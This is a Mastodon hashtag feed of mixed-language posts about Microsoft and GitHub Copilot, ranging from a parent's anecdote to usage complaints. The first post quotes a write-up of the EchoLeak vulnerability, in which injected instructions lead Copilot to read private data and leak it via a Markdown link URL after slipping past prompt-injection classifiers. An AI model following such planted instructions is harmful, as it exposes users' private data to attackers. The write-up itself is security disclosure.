Recherches récentes
Options de recherche
#copilot
13 messages10 participants3 messages aujourd’hui
"Aim Labs reported CVE-2025-32711 against Microsoft 365 Copilot back in January, and the fix is now rolled out.
This is an extended variant of the prompt injection exfiltration attacks we've seen in a dozen different products already: an attacker gets malicious instructions into an LLM system which cause it to access private data and then embed that in the URL of a Markdown link, hence stealing that data (to the attacker's own logging server) when that link is clicked.
The lethal trifecta strikes again! Any time a system combines access to private data with exposure to malicious tokens and an exfiltration vector you're going to see the same exact security issue.
In this case the first step is an "XPIA Bypass" - XPIA is the acronym Microsoft use for prompt injection (cross/indirect prompt injection attack). Copilot apparently has classifiers for these, but unsurprisingly these can easily be defeated:"
Simon Willison’s WeblogBreaking down ‘EchoLeak’, the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 CopilotAim Labs reported CVE-2025-32711 against Microsoft 365 Copilot back in January, and the fix is now rolled out. This is an extended variant of the prompt injection exfiltration attacks we've …
C'est sans doute parti de là pour arriver à ça : https://www.rtbf.be/article/la-minute-insolite-notre-amour-ne-suce-pas-ou-le-mois-des-fiertes-rate-de-microsoft-11557184
Microsoft mal wieder: Die impertinente Weise, mit der uns in Word und Excel die #Copilot-KI aufgedrängt wird, grenzt an Nötigung. In Excel lässt sich das Problem entschärfen. In Word bleibt uns nur die Totschläger-Methode. #Microsoft365
https://blog.clickomania.ch/2025/06/12/copilot-in-microsoft-word-deaktivieren/
#clickomaniach
OK, I've been very much opposed to pretty much every use of an #LLM I've encountered, but at the recommendation of a co-worker I tried GitHub's #copilot and... I'm kind of astounded. 
It walked me through the process of making a simple web app in Flask, translated my python code into a web app, helped me obfuscate my keys and debug when issues arose. What blew my mind is when it processed an error message and made a recommendation about how I should adjust my implementation.
Incredible.
A répondu dans un fil de discussion
If #AI were good … companies would [not be forcing] us to use it.
Very good point. The objective is to reduce labor costs, that is, to fire all knowledge and tech workers. It's not that it is better, it is that it is cheaper. Of course, this completely misses the point that someone has to generate the knowledge, the #writing, the images, as well as the raw #science data upon which to train the AIs, which requires people with experience doing the work.
This will not end well.
Whee
Zero-click AI data leak flaw uncovered in Microsoft 365 Copilot
The more the merrier: Microsoft Copilot Studio has now been separated from Power Platform in terms of licensing guides. Because AI agent licensing is about to get so complex that it couldn't fit inside a single PDF.
https://www.linkedin.com/feed/update/urn:li:activity:7337168988239507456/
A répondu dans un fil de discussion
We talked about:
1) How AIs like #Copilot are machines, not people, and they don’t actually have opinions.
2) AIs tell you what they think you want to hear, not always what’s correct.
3) What you say to Copilot goes right back to #Microsoft so don’t leave it on.
4) Because of all this, my son should only talk to Copilot or other AIs under parental supervision.
/4
A répondu dans un fil de discussion
I said, “Do you see what just happened there? It knows you like Cristiano Ronaldo so it talked like it’s a Cristiano Ronaldo fan and asked you a question about him.”
I didn’t realize #Copilot was still listening. It said “Right, it picks up on the cues and then tells you what it thinks you want to hear.”
That was pretty creepy, but it illustrated my point and made an impression on my son.
/3
Suite du fil
#Copilot started gushing about Cristiano Ronaldo, but the way it was talking sounded like Ronaldo’s publicist, if you know what I mean.
It followed up by asking my son, “What’s your favorite Cristiano Ronaldo moment?”
/2
I had a somewhat unsettling but very instructive experience with my son today about #artificialintelligence and I want to share it with parents and teachers wondering how to talk to their kids about AI.
My husband uses #Microsoft #Copilot on his phone sometimes and my son has seen him use it, so this morning he was asking Copilot questions, mostly about geography. Then he asked it “Do you like Cristiano Ronaldo?” (He’s a European football star.)
/1
Breaking news: someone revived #CDs to burn PICTURES on them! 
Because, obviously, we all need a retro mixtape with a side of AI-driven vulnerabilities and some good ol' #Copilot nonsense. 
https://github.com/arduinocelentano/cdimage #retrotech #mixtapes #AIvulnerabilities #nostalgia #HackerNews #ngated
GitHubGitHub - arduinocelentano/cdimage: A tool for burning visible pictures on a compact disc surfaseA tool for burning visible pictures on a compact disc surfase - arduinocelentano/cdimage
Google AI Overviews and Bing with Shorts in Copilot answers https://www.seroundtable.com/bing-copilot-answers-with-short-videos-39533.html
A répondu dans un fil de discussion
#Microsoft keeps installing #copilot and I keep uninstalling it.
Take a hint, Microsoft!
I must be using Microsoft #Copilot wrong. Most of the things I ask it to do end up screwed up. Example: I asked it to tell me all of the URL shorteners that use the .li TLD. It gave me a few and then pointed me to a list someone maintains on GitHub of URL shortener domains. Ok, good start. I ask it to pull all the .li domains from the list for me. It does that. But I spot checked the list and found it missed 30% of the .li domains on the list! How can it be that bad? #GenAI #AI